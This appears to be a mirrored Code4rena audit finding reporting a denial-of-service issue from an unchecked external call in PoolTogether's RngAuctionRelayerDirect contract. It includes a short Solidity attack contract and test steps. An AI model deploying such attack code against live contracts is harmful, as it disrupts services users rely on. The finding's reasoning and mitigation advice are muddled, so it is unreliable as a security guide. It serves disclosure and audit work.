Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
code423n4Code4renaCODE423N4:2023-08-POOLTOGETHER-FINDINGS-ISSUES-127
HistoryAug 07, 2023 - 12:00 a.m.

[M-02] Denial of Service on failed call Dos

2023-08-0700:00:00
Code4rena
github.com
4
dos
rngauctionrelayerdirect
external calls
require function
JSON

Lines of code

Vulnerability details

Impact

Detailed description of the impact of this finding.
External calls can fail accidentally or deliberately, which can cause a DoS condition in the contract. To minimize the damage caused by such failures, it is better to isolate each external call into its own transaction that can be initiated by the recipient of the call. This is especially relevant for payments, where it is better to let users withdraw funds rather than push funds to them automatically (this also reduces the chance of problems with the gas limit).

Proof of Concept

Provide direct links to all referenced code in GitHub.

https://github.com/GenerationSoftware/pt-v5-draw-auction/blob/f1c6d14a1772d6609de1870f8713fb79977d51c1/src/RngAuctionRelayerDirect.sol#L39
        (bool success, bytes memory returnData) = address(_rngAuctionRelayListener).call(data);

Add screenshots, logs, or any other relevant proof that illustrates the concept.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "/2023-08-pooltogether/pt-v5-draw-auction/src/RngAuctionRelayerDirect.sol";

import  "/2023-08-pooltogether/pt-v5-draw-auction/src/interfaces/IRngAuctionRelayListener.sol";

contract AttackRngAuctionRelayerDirect {

    RngAuctionRelayerDirect public rngAuctionRelayListener;

    constructor(RngAuctionRelayerDirect _rngAuctionRelayListener) public payable {
        rngAuctionRelayListener = RngAuctionRelayerDirect(_rngAuctionRelayListener);
    }


    function attack(RngAuctionRelayerDirect _rngAuctionRelayListener) public payable {
        rngAuctionRelayListener.relay(IRngAuctionRelayListener(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4), msg.sender);
        }

}

NB: Victim address in this test case is 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4
Test Case

  1. Deploy contract named AttackRngAuctionRelayerDirect.sol at victim address named RngAuctionRelayerDirect.sol.
  2. Go to attack button and enter victim contract address.
  3. Click attack button.
  4. Dos occurs.

Tools Used

VS Code

Recommended Mitigation Steps

Do not use call function.
use require function on call.

Assessed type

DoS

The text was updated successfully, but these errors were encountered:

All reactions

JSON